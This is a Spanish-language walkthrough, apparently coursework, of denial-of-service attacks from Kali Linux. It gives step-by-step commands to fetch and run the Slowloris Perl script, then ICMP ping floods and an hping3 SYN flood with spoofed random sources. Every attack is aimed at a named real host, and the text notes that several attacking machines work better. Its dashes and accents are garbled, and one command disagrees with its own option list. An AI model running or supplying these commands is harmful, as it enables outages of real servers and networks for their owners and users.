ATAQUE CON SLOWLORIS A SERVIDORES APACHE VULNERABLES

ATAQUES DoS (Denegacion de Servicio)

Se genera mediante la saturacin de los puertos con flujo de informacin, haciendo que el servidor
se sobrecargue y no pueda seguir prestando servicios; por eso se lo denomina denegacin, pues
hace que el servidor no de abasto a la cantidad de solicitudes. Esta tcnica es usada por los
llamados crackers para dejar fuera de servicio a servidores objetivo.
Para esta prctica vamos a utilizar bajo Kali Linux un sencillo script hecho en PERL, implementa
una potente e inteligente manera de generar una denegacin de servicio sobre un servidor Web
Apache. Para ello, se basa en la cantidad de peticiones que es capaz de mantener un servidor web
de forma concurrente. La forma de saturar el pool de servicios es mediante la creacin de
request HTTP (con HTTPs tambin funciona) de manera que empiezan a enviar cabeceras y ms
cabeceras al servidor de manera que asi se fuerza a mantener abiertas las conexiones por parte
del servidor. Los servidores web tienen determinado un nmero mximo global de sockets
permitidos.
1.- Accedemos a Kali Linux
2.- Ingresamos la siguiente direccin en nuestro navegador para obtener el script slowloris el cual
nos permitir realizar el ataque: ha.ckers.org/slowloris/slowloris.pl

3.- Copiamos el cdigo y lo guardamos en un archivo en el escritorio con el nombre slowloris.pl

4.- Requisitos:
Este es un programa Perl que requiere el intrprete Perl con los mdulos; IO :: socket :: INET, IO ::
Socket :: SSL, y Getopt
Para ello instalamos de la siguiente manera:
perl MCPAN e install IO::Socket::INET
perl MCPAN e install IO::Socket::SSL
sudo apt-get install libgetopt-mixed-perl
sudo apt-get install perl doc

5.- Una vez instalados los componentes necesarios procedemos a realizar el ataque DoS, para ello
debemos dar permisos sobre el achivo creado slowloris.pl, mediante:
# cd Desktop
# ls
# chmod 777 slowloris.pl

6.- Ejecutamos el ataque a un servidor WEB objetivo mediante la instruccin:

# perl ./slowloris.pl dns www.uti.edu.ec port 80 timeout 1 num 1000 cache

INUNDACION DE ICMP
Es una tcnica que pretende agotar el ancho de banda de la vctima. Consiste en enviar de forma
continuada un nmero elevado de paquetes ICMP, (ping) de tamao considerable a la vctima, de
forma que esta ha de responder con paquetes, lo que supone una sobrecarga tanto de la red como
en el sistema de la vctima.
Dependiendo de la relacin entre la capacidad de procesamiento de la vctima y el atacante, el
grado de sobrecarga vara, es decir, si un atacante tiene una capacidad mucho mayor, la vctima no
puede manejar el trfico generado.
El comando hping3, es un analizador/ensamblador de paquetes TCP/IP de uso en modo consola,
hping no solo es capaz de enviar paquetes ICMP, sino adems tambin puede enviar paquetes
TCP, UDP, y RAW-IP
Por ejemplo si queremos hacer un ataque simple que sobrecargue el procesamiento o respuesta
de un x computador conectado a la red lo hacemos mediante la instruccin:
# ping 192.168.1.5 l 5000 t
Esto enviara cada segundo 5000 paquetes continuamente saturando el canal y por ende afectando
la respuesta de la pc vctima.
Otro derivado de este es:
#ping t a uti.edu.ec n 10000
Esto har que se enven 10000 solicitudes de ping a la pgina y se sature, aunque es mejor si hay
varias pc atacantes realizando la misma accin contra el servidor o pc vctima.
En Kali Linux se puede hacer uso del comando hping3 y podemos ver con un sniffer como
wireshark, como se captura el trfico enviado hacia una terminal elegida, y la carga que este
soporta:

Ahora reforzando un poco la instruccin:

# hping3 c 10000 d 120 S w 64 p 21 flood rand-source www.uti.edu.ec
Donde:

Hping3: comando a utilizar

-c 10000: nmero de paquetes a enviar
-d 120: tamao de cada paquete enviado
-S : solo se enva paquetes SYN
-w 64: Tamao de ventana TCP
-p 80 : Puerto de destino
--flood : Envo rpido de paquetes, sin tener cuidado de mostrar respuestas entrantes
--rand-source : Uso de direcciones IP origen al azar, tambin se puede usar ao spoof para
ocultar los nombres de host
www.uti.edu.ec : direccin de destino o victima
Demostracin:

Podemos ver como en unos segundos se ha inundado la red con ms de 600000 paquetes
transmitidos de forma ininterrumpida, esto suele causar que la red se colapse, impidiendo a otros
usuarios poder utilizarla, ya que hping no deja espacio entre paquete-paquete, para que otras
mquinas transmitan ningn otro tipo de informacin.

CUANTAS CONEXIONES SOPORTA ACTUALMENTE APACHE SQUID?

Esto depende del hardware (Servidor) que se ha configurado, ya que squid y apache consumen
CPU, RAM, a de ms que debe tener una buena tarjeta de red que soporte las conexiones puede
ser de 100/1000 Mbps.
Es de tomar muy en cuenta adems el tipo de switch utilizado ya que al realizar la conexin en
cascada puede ralentizar la red gravemente.
Un servidor correctamente configurado puede soportar de 100 a 150 estaciones de trabajo,
conectadas de forma simultnea, aconsejable utilizar un backbone si se utiliza en cascada.